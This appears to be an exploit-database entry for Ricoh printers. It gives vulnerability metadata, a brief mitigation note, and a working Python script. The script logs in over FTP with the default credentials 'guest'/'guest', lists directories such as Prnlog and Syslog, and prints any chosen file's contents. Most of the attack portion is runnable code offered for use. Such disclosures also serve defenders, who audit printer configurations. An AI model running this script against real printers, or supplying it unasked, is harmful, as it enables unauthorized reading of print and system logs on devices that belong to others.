Ricoh Printer Directory and File Exposure

vendor:

Ricoh Printers

by:

Thomas Heverin

6.1

CVSS

HIGH

Directory and File Exposure

200

CWE

Product Name: Ricoh Printers

Affected Version From: All versions

Affected Version To: All versions

Patch Exists: NO

Related CWE:

CPE: h:ricoh:printers

Metasploit:

Other Scripts:

Platforms Tested: Windows

2023

Ricoh Printer Directory and File Exposure

The exploit allows an attacker to connect to a Ricoh printer over FTP using default credentials and access directories such as Help, Info (Printer Information), Prnlog (Print Log), Stat (Statistics), and Syslog (System Log). The attacker can list files and directories, read files, and potentially extract sensitive information.

Mitigation:

To mitigate this vulnerability, it is recommended to change the default credentials on Ricoh printers and restrict access to FTP services. Regularly monitoring FTP connections and reviewing access logs can also help detect unauthorized access.

Source

Exploit-DB raw data:

#Exploit Title: Ricoh Printer Directory and File Exposure 
#Date: 9/15/2023
#Exploit Author: Thomas Heverin (Heverin Hacker)
#Vendor Homepage: https://www.ricoh.com/products/printers-and-copiers
#Software Link: https://replit.com/@HeverinHacker/Ricoh-Printer-Directory-and-File-Finder#main.py
#Version: Ricoh Printers - All Versions
#Tested on: Windows
#CVE: N/A 

#Directories Found: Help, Info (Printer Information), Prnlog (Print Log), Stat (Statistics) and Syslog (System Log)

from ftplib import FTP

def ftp_connect(ip):
    try:
        ftp = FTP(ip)
        ftp.login("guest", "guest")
        print(f"Connected to {ip} over FTP as 'guest'")
        return ftp
    except Exception as e:
        print(f"Failed to connect to {ip} over FTP: {e}")
        return None

if __name__ == "__main__":
    target_ip = input("Enter the Ricoh Printer IP address: ")
    
    ftp_connection = ftp_connect(target_ip)
    if ftp_connection:
        try:
            while True:
                file_list = ftp_connection.nlst()
                print("List of Ricoh printer files and directories:")
                for index, item in enumerate(file_list, start=1):
                    print(f"{index}. {item}")
                
                file_index = int(input("Enter the printer index of the file to read (1-based), or enter 0 to exit: ")) - 1
                if file_index < 0:
                    break
                
                if 0 <= file_index < len(file_list):
                    selected_file = file_list[file_index]
                    lines = []
                    ftp_connection.retrlines("RETR " + selected_file, lines.append)
                    print(f"Contents of '{selected_file}':")
                    for line in lines:
                        print(line)
                else:
                    print("Invalid file index.")
        except Exception as e:
            print(f"Failed to perform operation: {e}")
        finally:
            ftp_connection.quit()